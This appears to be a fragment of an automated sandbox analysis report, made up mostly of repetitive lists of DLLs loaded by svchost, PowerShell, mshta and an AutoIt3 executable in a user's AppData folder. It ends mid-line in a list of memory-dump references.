      Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: ieframe.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: netapi32.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: imgutil.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: slc.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dll
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeSection loaded: wsock32.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeSection loaded: winmm.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeSection loaded: wsock32.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeSection loaded: winmm.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32Jump to behavior
      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
      Source: Binary string: BthUdTask.pdbGCTL source: mshta.exe, 00000003.00000003.2248732178.0000020567AD2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2250278393.0000020567B50000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2263967189.000001FD64F86000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2254394893.0000020567B50000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2248649818.000002056BAF4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2254566671.0000020567B52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2247357184.0000020567ADC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2248042575.000001FD6503C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2254039298.0000020567B50000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2248857191.000002056BAB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2248857191.000002056BAC7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2247357184.0000020567B50000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.2211852416.000001CAD88ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.2211213841.000001CAD63BE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 